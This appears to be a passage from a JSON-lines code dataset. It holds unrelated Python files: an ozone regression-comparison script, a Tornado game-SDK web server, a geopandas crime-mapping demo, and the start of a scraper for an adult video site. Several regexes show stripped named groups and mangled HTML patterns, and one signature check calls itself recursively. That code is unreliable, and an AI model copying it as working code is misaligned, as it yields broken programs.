'/users/mjr583/scratch/NCAS_CVAO/CVAO_datasets/'\n savepath = '/users/mjr583/scratch/NCAS_CVAO/plots/'\n \n filen = filepath+'20191007_CV_Merge.csv'\n df = pd.read_csv(filen, index_col=0,dtype={'Airmass':str})\n df.index = pd.to_datetime(df.index,format='%d/%m/%Y %H:%M')\n \n cols = list(df) \n for col in cols:\n try:\n df[col] = df[col].loc[~(df[col] <= 0.)]\n except:\n pass\n \n ## in test case just use Ozone data for now\n start_year='2007'\n years = np.arange(2007, 2020)\n spec = 'O3'\n data = df[spec][start_year:]\n data['2009-07-01' : '2009-09-30'] = np.nan\n nyears = len((data.resample('Y').mean()).index.year)\n daily = data.resample('D').mean()\n \n y = np.array(daily)\n x = np.arange(len(y))\n\n idx=np.isfinite(y)\n y = y[idx]\n x = x[idx]\n \n '''\n x = np.array([\n 7.02490389, 5.84673882, 6.22362901, 5.89447501, 6.50522957,\n 5.80298616, 6.17497626, 6.57451761, 6.47010046, 6.04077582,\n 5.90118102, 6.77270208, 6.43396724, 6.41136767, 6.12493598,\n 5.90716534, 6.32037763, 7.39491283, 6.36049059, 5.9670787 ,\n 6.85141919, 6.26910599, 6.20254179, 6.9836126 , 6.63848388,\n 6.21000692, 6.23215349, 6.2068118 , 6.39700798, 5.68460809,\n 6.0957604 , 5.93433827, 6.92329796, 6.87485541, 6.64441035,\n 6.5876272 , 6.21395565, 6.97018765, 5.8405509 , 6.68689768,\n 6.55696236, 5.91300654, 5.77200607, 6.18620691, 6.46252992,\n 5.84408498, 5.72175502, 6.28586177, 6.1426537 , 5.97624839,\n 7.2909262 , 6.26629957, 6.35857082, 6.00486819, 5.96392117,\n 6.79158893, 6.88007737, 5.79147038, 6.32788946, 5.89282374,\n 5.246736 , 6.79574812, 6.57403906, 6.14307375, 7.00910025,\n 5.7563269 , 6.351342 , 6.53075042, 5.71545834, 6.30847149,\n 7.02490349, 6.40364356, 6.16509938, 6.4619477 , 6.70890128,\n 6.51323415, 6.99526207, 5.98790113, 5.92062987, 6.07047262,\n 7.05354862, 5.71384054, 6.60230794, 7.0169052 , 6.36480226,\n 6.31785604, 5.61791288, 6.85937139, 5.75865116, 5.72959174,\n 5.90952266, 6.42005849, 6.93056586, 6.01429019, 6.9796715 ,\n 6.94304459, 6.75550702, 5.66799426, 6.98226771, 6.04554234])\n \n y = np.array([\n 8.40544072, 7.23576875, 7.36491546, 6.0339046 , 7.97447602,\n 7.15119055, 6.54041287, 7.17955333, 7.61995614, 7.45436687,\n 6.51994675, 6.86866468, 7.93039991, 7.96141096, 6.74008807,\n 6.24162408, 7.56592469, 8.90243085, 7.93080636, 7.69373893,\n 8.1495254 , 7.31618462, 7.38623682, 8.27756635, 7.26490068,\n 7.62419581, 8.09272363, 6.83289432, 7.00903454, 7.32198232,\n 7.76544704, 7.86794507, 7.34049199, 7.16680021, 7.28097398,\n 7.1300533 , 7.56470235, 8.53067913, 6.5722756 , 8.35793814,\n 7.85134993, 6.28578289, 6.78504232, 7.46187614, 7.63509705,\n 7.14787352, 7.76011323, 7.73277699, 6.61017633, 7.04707694,\n 8.11976918, 7.57491045, 7.6502606 , 7.81891365, 7.5169907 ,\n 7.10958076, 8.10664908, 6.41070742, 7.42201405, 7.1440822 ,\n 6.71524939, 8.29542569, 7.40644049, 6.88359516, 8.10013957,\n 6.17323241, 6.89164089, 8.18856187, 6.43704836, 7.1734189 ,\n 7.33072932, 8.21214643, 7.73751715, 7.73084165, 8.5996884 ,\n 8.08276146, 7.83624525, 7.24484867, 6.62742944, 5.95489133,\n 8.05221471, 6.09695074, 8.934238 , 8.4620742 , 7.03271364,\n 6.62512029, 7.76597935, 7.76624445, 6.84164444, 7.15060009,\n 7.05616176, 7.62173155, 8.63441307, 6.77385575, 7.61571327,\n 7.87055929, 8.07943385, 6.48806751, 7.88899205, 7.61359413])\n '''\n # estimate total standard uncertanties for each data point\n dx = np.sqrt((x * sigma_x_rel)**2 + sigma_x_abs**2)\n dy = np.sqrt((y * sigma_y_rel)**2 + sigma_y_abs**2)\n\n # calculate total relative uncertainty [%]\n u_x = np.mean(dx / x) * 100\n u_y = np.mean(dy / y) * 100\n\n parameters = dict()\n\n label = 'Truth: y={:1.2f}x{:+1.2f}'.format(slope_true, intercept_true)\n parameters = {label: (intercept_true, slope_true, np.nan, np.nan)}\n\n # bivariate, York et al 2004\n slope, intercept, S, cov = bivariate_fit(\n x, y, dx, dy, b0=0.0)\n label = 'York, 2004 :y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # OLS\n slope, intercept = np.polyfit(x, y, 1)\n S = np.nan\n cov = np.nan\n label = 'OLS: y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # Bayes OLS.\n slope, intercept = bayes_ols_fit(x, y)\n S = np.nan\n cov = np.nan\n label = 'Bayes OLS: y={:1.2f}x+{:1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # Deming\n slope, intercept = deming_fit(x, y)\n S = np.nan\n cov = np.nan\n label = 'Deming: y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # ODR, weighted orthogonal distance regression\n slope, intercept = odr_fit(x, y, dx, dy)\n S = np.nan\n cov = np.nan\n label = 'ODR: y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # quantile\n slope, intercept, cov = quantile_fit(x, y)\n S = np.nan\n label = 'Quantile: y={:1.2f}x+{:1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # pca\n slope, intercept = pca_fit(x, y)\n S = np.nan\n cov = np.nan\n label = 'PCA: y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n fig = plt.figure(figsize=(9, 9))\n ax = fig.add_subplot(111)\n\n # plot error bar\n ax.errorbar(\n x, y,\n xerr=dx, yerr=dy,\n fmt='o',\n errorevery=100,\n linestyle='None',\n marker='.',\n ecolor='k',\n elinewidth=0.5,\n barsabove=True,\n label=None)\n\n xlim = np.array(ax.get_xlim())\n ylim = np.array(ax.get_ylim())\n\n for label, (intercept, slope, S, cov) in parameters.items():\n ax.plot(xlim, slope*xlim + intercept, '-', label=label)\n\n plt.suptitle('ITO Homework Fig. 1, synthetic data\\nThe correct relationship is y={:1.2f}x{:+1.2f}'.format(slope_true, intercept_true), fontsize=16)\n\n ax.set_xlabel('x, total uncertainty {:1.0f}%'.format(u_x))\n ax.set_ylabel('y, total uncertainty {:1.0f}%'.format(u_y))\n\n ax.set_xlim(xlim)\n ax.set_ylim(ylim)\n ax.grid(b=True)\n ax.legend(loc='lower right')\n plt.show()","sub_path":"code/regression_estimators_CVAO.py","file_name":"regression_estimators_CVAO.py","file_ext":"py","file_size_in_byte":18277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"325369346","text":"\"\"\"\n后台统一提供数据\n\"\"\"\nimport tornado.web\nimport tornado.httpserver\nimport tornado.ioloop\nfrom tornado.options import options\n\nimport settings\nimport platform_defines\nfrom utils.handler_mixn import HandlerMixin\nfrom utils.async_mysql import AsyncMysql\nfrom utils.sign_mixin import SignMixin\nfrom game_server import ZQWebGateway\n\n\nclass Web(tornado.web.RequestHandler, HandlerMixin):\n \"\"\"通用web类\"\"\"\n\n def initialize(self, mysql, game_server):\n self._mysql = mysql # 数据库对象引用\n self.game_server = game_server\n pass\n\n @tornado.web.asynchronous\n def get(self, app_id, handler_name, action):\n \"\"\"处理get请求\"\"\"\n print('**打印日志信息:post_url:{}, body:{}**'.format(self.request.uri, self.request.body))\n self.handle_request_with_process(app_id, handler_name, action)\n\n @tornado.web.asynchronous\n def post(self, app_id, handler_name, action):\n \"\"\"处理post请求\"\"\"\n print('**打印日志信息:post_url:{}, body:{}**'.format(self.request.uri, self.request.body))\n self.handle_request_with_process(app_id, handler_name, action)\n\n\nclass Voice(Web, SignMixin):\n \"\"\"语音识别\"\"\"\n\n def on_voice_callback(self, packet, msg):\n \"\"\"返回回调\"\"\"\n data = {'status':200, 'data': packet} if msg else {'status':403, 'data':packet}\n self.write(data)\n self.finish()\n\n\nclass CreateOrder(Web, SignMixin):\n \"\"\"下单\"\"\"\n\n def on_create_order_callback(self, succeed, msg):\n \"\"\"订单回调\"\"\"\n data ={'status':200, 'data':succeed} if succeed else {'status':403, 'data':msg}\n self.write(data)\n self.finish()\n\n\nclass LevelUpdate(Web, SignMixin):\n \"\"\"等级更新接口\"\"\"\n def on_level_update_callback(self):\n pass\n\n def check_sign(self, packet):\n \"\"\"md5校验登录参数\"\"\"\n return packet['sign'] == self.check_sign(packet)\n\n\ndef start():\n # 导入数据大字典\n platform_defines.import_defines()\n try:\n tornado.options.parse_command_line()\n # 初始化数据库\n mysql = AsyncMysql(db_config=settings.db_condig['development'])\n # 初始化游戏服务器\n game_server_params = settings.game_server_config[options.mode]\n game_server = ZQWebGateway(game_server_params['host'], game_server_params['port'], mysql=mysql)\n app = tornado.web.Application([\n # 以下几个是公共接口\n (r'/(?P[^/]+)/(?P[^/]+)/(?P[^/]+)', CreateOrder, dict(mysql=mysql, game_server=game_server)), # 百度语音访问\n # 以下是特殊接口\n (r'/(?P[^/]+)/(?P[^/]+)/(?Pvoice_translate)', Voice, dict(mysql=mysql, game_server=game_server)), # 百度语音访问\n (r'/(?P[^/]+)/(?P[^/]+)/(?Plevel_update)', LevelUpdate, dict(mysql=mysql, game_server=game_server)), # 等级更新接口\n ])\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port, options.address)\n tornado.ioloop.IOLoop.current().start()\n except KeyboardInterrupt:\n tornado.ioloop.IOLoop.instance().stop()\n except Exception as e:\n \"\"\"此异常先不处理,直接抛出\"\"\"\n print(e)\n raise\n\n\ndef main():\n \"\"\"入口函数\"\"\"\n # 定义一些全局变量\n options.define(name='port', default=settings.PORT, help='run on the give port', type=int) # 服务器端口\n options.define(name='address', default=settings.HOST, help='run on give on address', type=str) # 服务器地址\n options.define(name='mode', default='development', help='default run in development mode') # 运行模式\n start()\n\n\nif __name__ == \"__main__\":\n main()\n # 多线程数据库已经写好,后面的一些参数可以存在数据库中\n # 测试url:127.0.0.1:8080/0/level_update/level_update?name=dwh&age=18\n # 测试url:127.0.0.1:8080/0/pay_notice/test?my_order_id=152&theirs_order_id=520&price=1000\n","sub_path":"tornado_SDK/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"186098782","text":"import pandas as pd\nimport geopandas\nfrom shapely.geometry import Point\nimport matplotlib.pyplot as plt\nimport shapely.speedups\n\n\nlondon_boroughs = geopandas.GeoDataFrame.from_file('/Users/michaelpatterson/PycharmProjects/group_project/London_Borough_Excluding_MHW.shp')\ncrimes = pd.read_csv('/Users/michaelpatterson/PycharmProjects/group_project/polygon_demo.csv')\nlondon_boroughs=london_boroughs.to_crs(epsg=4326)\ndemo_borough = london_boroughs[london_boroughs['NAME'].str.contains('Kensington', regex=False)]\nprint(demo_borough)\n\n\n#Creates a geopandas dataframe from february predictions\ngeometry = [Point(xy) for xy in zip(crimes.center_x, crimes.center_y)]\ndf = crimes.drop(['center_x', 'center_y'], axis=1)\ncrs = {'init': 'epsg:4326'}\ncrimes_geo = geopandas.GeoDataFrame(\n df,geometry=geopandas.points_from_xy(crimes.center_x,crimes.center_y))\n\ninside_borough = []\noutside_borough = []\n\nshapely.speedups.enable()\nfor i,borough in london_boroughs.iterrows():\n if i != 23:\n continue\n for j,point in crimes_geo.iterrows():\n if point.geometry.within(borough.geometry):\n inside_borough.append(point)\n else:\n outside_borough.append(point)\n\ninside = geopandas.GeoDataFrame(inside_borough)\noutside = geopandas.GeoDataFrame(outside_borough)\n\n\n#code to map out London LSOA's\nfig, ax = plt.subplots()\nax.axis('off')\ndemo_borough.geometry.plot(ax=ax, facecolor='black')\ninside[\"geometry\"].plot(ax=ax, facecolor='red')\noutside[\"geometry\"].plot(ax=ax, facecolor='blue')\nplt.tight_layout()\nplt.show()","sub_path":"geospacing_demo.py","file_name":"geospacing_demo.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"234457918","text":"import re\nimport urllib2\n\ntry:\n from animeGet.vidsite import vidSeries\n from animeGet.util import memorize, unescape, webpage\nexcept ImportError:\n from vidsite import vidSeries\n from util import memorize, unescape, webpage\n\nclass javon(vidSeries):\n defaultServer = '08'\n \n compOne = re.compile('Server VIP #08:(?P[^:]*):')\n compTwo = re.compile('
    [^\"]*)\">')\n initialComp = re.compile('[^\"]*)\" title=\"Watch Online')\n pageComp = re.compile('
  • [^\"]*)\" rel=\"bookmark\"')\n \n siteTemplate = 'http://javon.tv/{}'\n seriesTemplate = siteTemplate\n tags = ['ja', 'javon']\n \n @property\n @memorize\n def intUrlObj(self):\n intUrl = self.webpageIt(self.initialComp.search(self.source).group('link'))\n return intUrl\n \n @property\n @memorize\n def pages(self):\n pages = list()\n pageParse = self.compOne.search(self.intUrlObj.source).group('pageSet')\n for r in self.compTwo.findall(pageParse):\n pages.append(self.page(self.siteTemplate.format(r)))\n return pages\n \n @property\n @memorize\n def title(self):\n #return self.name.split('/')[-1].replace('.html', '')\n titleReturn = self.pages[0].title\n if titleReturn == '':\n return self.name.split('/')[-1].replace('.html', '')\n return titleReturn\n \n class page(vidSeries.page):\n fileComp = re.compile('flashvars.file=\"(?P[^\"]*)\"')\n flvComp = re.compile('url=(?P[^&]*)&')\n keyVarComp = re.compile('flashvars.filekey=(?P[^;]*);')\n keyComp = NotImplemented\n linkComp = re.compile('